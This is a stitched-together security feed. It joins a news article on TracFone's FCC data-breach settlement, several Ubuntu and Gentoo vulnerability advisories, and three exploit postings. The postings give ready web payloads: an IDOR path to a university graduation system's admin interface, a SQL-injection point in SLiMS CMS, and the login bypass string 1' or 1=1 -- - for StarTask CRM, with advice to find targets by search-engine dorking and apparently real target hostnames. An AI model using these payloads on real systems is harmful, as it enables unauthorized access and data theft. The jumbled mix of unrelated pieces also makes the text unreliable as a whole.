Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection

Following three separate data breaches between 2021 and 2023 which exposed the proprietary information (PI) of TracFone Wireless customers, the Federal Communications Commission (FCC) announced that the Verizon-owned company has agreed to pay a $16 million civil penalty to settle the government investigation, and it has made an agreement to improve its application programming interface  (API) security.

TracFone Wireless Inc. is an American prepay wireless service provider wholly owned by Verizon. TracFone services are used by the brands Straight Talk, Total by Verizon Wireless, and Walmart Family Mobile.

The settlement ends an investigation into TracFone’s security practices to uncover whether the breaches were the result of ineffective cybersecurity protocols. The Enforcement Bureau (EB) of the FCC found that cybercriminals gained access to certain TracFone customer information, including PI and customer proprietary network information (CPNI), by exploiting vulnerabilities related to customer-facing APIs.

APIs allow different computer programs or components to communicate with one another. When the security behind the APIs is not secure enough, cybercriminals can abuse them to gather information without authorization.

The FCC media release explains in detail that it is possible to leverage numerous APIs to access customer information from websites. And according to the FCC’s own Enforcement Bureau, that is exactly what happened at TracFone.

In addition to the civil penalty, the FCC secured extra assignments for TracFone in the Consent Decree:

*   TracFone has to deploy a mandated information security program, with novel provisions to reduce API vulnerabilities in ways consistent with widely accepted standards, like those identified by the National Institute of Standards and Technology (NIST) and the Open Worldwide Application Security Project (OWASP).
*   TracFone must improve protection measures against SIM-swapping. SIM swapping (and the very similar port-out fraud) is the unlawful use of someone’s personal information to steal their phone number and swap or transfer it to another device. With this, criminals can intercept calls, messages, and certain multi-factor authentication (MFA) codes.
*   TracFone has to undergo annual assessments—including by independent third parties—of its information security program.
*   Employees and certain third parties are to receive privacy and security awareness training.

The Enforcement Bureau reported to the FCC that:

> “After gaining access to customer information during one of the three breaches, the threat actors completed an undisclosed number of unauthorized port-outs.”

 All this occurs as the FCC has continued a mission against SIM-swapping.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your exposure****

You can verify whether your information is available online due to data breaches by using the Malwarebytes Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report. For those whose information was not included, you’ll still likely find other exposures in previous data breaches.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 TracFone will pay $16 million to settle FCC data breach investigation 

Ubuntu Security Notice 6912-1 - James Henstridge discovered that provd incorrectly handled environment variables. A local attacker could possibly use this issue to run arbitrary programs and escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-6912-1July 24, 2024provd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:provd could be made to run programs as an administrator.Software Description:- provd: Ubuntu Desktop Provision init backendDetails:James Henstridge discovered that provd incorrectly handled environmentvariables. A local attacker could possibly use this issue to run arbitraryprograms and escalate privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   provd                           0.1.2+24.04In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6912-1   CVE-2024-6714,https://bugs.launchpad.net/ubuntu/+source/provd/+bug/2071574Package Information:   https://launchpad.net/ubuntu/+source/provd/0.1.2+24.04

Ubuntu Security Notice USN-6912-1

Gentoo Linux Security Advisory 202407-28 - A vulnerability has been discovered in Freenet, which can lead to deanonymization due to path folding. Versions greater than or equal to 0.7.5_p1497 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Freenet: Deanonymization Vulnerability  
     Date: July 24, 2024  
     Bugs: #904441  
       ID: 202407-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Freenet, which can lead to  
deanonymization due to path folding.

Background  
==========

Freenet is an encrypted network without censorship.

Affected packages  
=================

Package          Vulnerable     Unaffected  
---------------  -------------  --------------  
net-p2p/freenet  < 0.7.5_p1497  >= 0.7.5_p1497

Description  
===========

This release fixes a severe vulnerability in path folding that allowed  
to distinguish between downloaders and forwarders with an adapted  
node that is directly connected via opennet.

Impact  
======

This release fixes a severe vulnerability in path folding that allowed  
to distinguish between downloaders and forwarders with an adapted  
node that is directly connected via opennet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Freenet users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/freenet-0.7.5_p1497"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-28

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-28

Gentoo Linux Security Advisory 202407-27 - Multiple vulnerabilities have been discovered in ExifTool, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 12.42 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: ExifTool: Multiple vulnerabilities  
     Date: July 24, 2024  
     Bugs: #785667, #791397, #803317, #832033  
       ID: 202407-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in ExifTool, the worst of  
which could lead to arbitrary code execution.

Background  
==========

ExifTool is a platform-independent Perl library plus a command-line  
application for reading, writing and editing meta information in a wide  
variety of files.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/exiftool  < 12.42       >= 12.42

Description  
===========

Multiple vulnerabilities have been discovered in ExifTool. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All ExifTool users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/exiftool-12.42"

References  
==========

[ 1 ] CVE-2021-22204  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22204  
[ 2 ] CVE-2022-23935  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23935

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-27

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-27

Ubuntu Security Notice 6906-1 - It was discovered that python-zipp did not properly handle the zip files with malformed names. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6906-1  
July 24, 2024

python-zipp vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

python-zipp could be made to crash if certain zip files are used.

Software Description:  
- python-zipp: pathlib-compatible Zipfile object wrapper - Python 3.x

Details:

It was discovered that python-zipp did not properly handle the zip files  
with malformed names. An attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   python3-zipp                    1.0.0-6ubuntu0.1

Ubuntu 22.04 LTS  
   python3-zipp                    1.0.0-3ubuntu0.1

Ubuntu 20.04 LTS  
   pypy-zipp                       1.0.0-1ubuntu0.1  
   python-zipp                     1.0.0-1ubuntu0.1  
   python3-zipp                    1.0.0-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6906-1  
   CVE-2024-5569

Package Information:  
   https://launchpad.net/ubuntu/+source/python-zipp/1.0.0-6ubuntu0.1  
   https://launchpad.net/ubuntu/+source/python-zipp/1.0.0-3ubuntu0.1  
   https://launchpad.net/ubuntu/+source/python-zipp/1.0.0-1ubuntu0.1

Ubuntu Security Notice USN-6906-1

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

**SIM Wisuda 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 7fed84c74a95aca63927ebf377895e9a07606b145886012809d45f932101a348

Download | Favorite | View

**SIM Wisuda 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : SIM Wisuda v1.0 IDOR Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://academic.uii.ac.id/wisuda/                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /login/apps/?menu=Lulusan[+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=LulusanGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

SIM Wisuda 1.0 Insecure Direct Object Reference

SLiMS CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : SLiMS CMS v2.0 Sql injection Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://slims.web.id/web/news/slims-competition-plugin-and-template/                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "index.php?p=show_detail&id=471"<===== inject here[+] https://www/127.0.0.1/libman1blitarschid/index.php?p=show_detail&id=471Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

SLiMS CMS 2.0 SQL Injection

Ubuntu Security Notice 6910-1 - Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain commands. A remote attacker could possibly use this issue to terminate the program, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. Peter Stoeckli discovered that Apache ActiveMQ incorrectly handled hostname verification. A remote attacker could possibly use this issue to perform a person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6910-1  
July 23, 2024

activemq vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Apache ActiveMQ.

Software Description:  
- activemq: Java message broker - server

Details:

Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain  
commands. A remote attacker could possibly use this issue to terminate  
the program, resulting in a denial of service. This issue only affected  
Ubuntu 16.04 LTS. (CVE-2015-7559)

Peter Stöckli discovered that Apache ActiveMQ incorrectly handled  
hostname verification. A remote attacker could possibly use this issue  
to perform a person-in-the-middle attack. This issue only affected Ubuntu  
16.04 LTS. (CVE-2018-11775)

Jonathan Gallimore and Colm Ó hÉigeartaigh discovered that Apache  
ActiveMQ incorrectly handled authentication in certain functions.  
A remote attacker could possibly use this issue to perform a  
person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS,  
Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-13920)

Gregor Tudan discovered that Apache ActiveMQ incorrectly handled  
LDAP authentication. A remote attacker could possibly use this issue  
to acquire unauthenticated access. This issue only affected Ubuntu 16.04  
LTS, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2021-26117)

It was discovered that Apache ActiveMQ incorrectly handled  
authentication. A remote attacker could possibly use this issue to run  
arbitrary code. (CVE-2022-41678)

It was discovered that Apache ActiveMQ incorrectly handled  
deserialization. A remote attacker could possibly use this issue to run  
arbitrary shell commands. (CVE-2023-46604)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   activemq                        5.16.1-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.16.1-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   activemq                        5.15.11-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.15.11-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   activemq                        5.15.8-2~18.04.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.15.8-2~18.04.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   activemq                        5.13.2+dfsg-2ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.13.2+dfsg-2ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6910-1  
   CVE-2015-7559, CVE-2018-11775, CVE-2020-13920, CVE-2021-26117,  
   CVE-2022-41678, CVE-2023-46604

Ubuntu Security Notice USN-6910-1

Ubuntu Security Notice 6530-2 - Seth Manesse and Paul Plasil discovered that HAProxy incorrectly handled URI components containing the hash character. A remote attacker could possibly use this issue to obtain sensitive information, or to bypass certain path_end rules.

    ==========================================================================Ubuntu Security Notice USN-6530-2July 23, 2024haproxy vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:HAProxy could be made to expose sensitive information.Software Description:- haproxy: fast and reliable load balancing reverse proxyDetails:Seth Manesse and Paul Plasil discovered that HAProxy incorrectly handledURI components containing the hash character (#). A remote attacker couldpossibly use this issue to obtain sensitive information, or to bypasscertain path_end rules.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   haproxy                         1.8.8-1ubuntu0.13+esm2                                   Available with Ubuntu ProUbuntu 16.04 LTS   haproxy                         1.6.3-1ubuntu0.3+esm1                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6530-2   https://ubuntu.com/security/notices/USN-6530-1   CVE-2023-45539

Ubuntu Security Notice USN-6530-2

StarTask CRM version 1.9 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : StarTask CRM v1.9 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : http://p30vel.ir.domains.blog.ir/                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer&Pass : 1' or 1=1 -- -[+] https://www/127.0.0.1/rkexpress.in/dash.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#vulnerability